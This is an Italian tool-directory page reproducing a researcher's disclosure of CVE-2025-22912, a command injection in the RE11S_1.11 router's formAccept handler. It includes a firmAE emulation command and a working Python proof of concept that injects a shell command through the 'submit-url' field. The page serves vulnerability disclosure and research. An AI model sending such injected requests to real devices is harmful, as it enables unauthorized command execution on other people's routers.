Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RE11S_1.11-formAccept-CommandInjection — CVE-2025-22912 | Kitploit
Strumenti/GitHubGitHub/passwa11/re11s_1.11-formaccept-commandinjection
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebFuzzingPenetration TestingCommand and Control

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
passwa11/re11s_1.11-formaccept-commandinjection

RE11S_1.11-formAccept-CommandInjection

CVE-2025-22912

Vedi Repository
1 anno faNon ancora revisionato

RE11S_1.11-formAccept-CommandInjection

Durante il mio tirocinio presso Qi An Xin Tiangong Lab, ho scoperto una vulnerabilità di command injection nel router RE11S_1.11.

Analizzando il file webs nella directory bin, ho scoperto che la funzione formAccept contiene una vulnerabilità di command injection.

La command injection può essere innescata dal valore della chiave submit-url, che porta a un'iniezione di comandi di sistema.

image-20241224100434040

Come possiamo simulare un router

Usa il seguente comando per simulare con firmAE.

root@kitploit:~
sudo ./run.sh -r v1 ~/IOT/RE11S_1.11/RE11S_1.11.bin

Il contenuto del file poc.py è il seguente:

root@kitploit:~
import requests

url = "http://192.168.9.2/goform/formAccept"
data = {
	"submit-url":"touch /tmp/xyq"
}

r = requests.post(url,data=data)
print(r.text)

Risultato dell'attacco

image-20241224100515030

Si può vedere che un file /tmp/xyq viene aggiunto dopo l'esecuzione, il che dimostra che l'attacco ha avuto successo.

Scarica lo strumento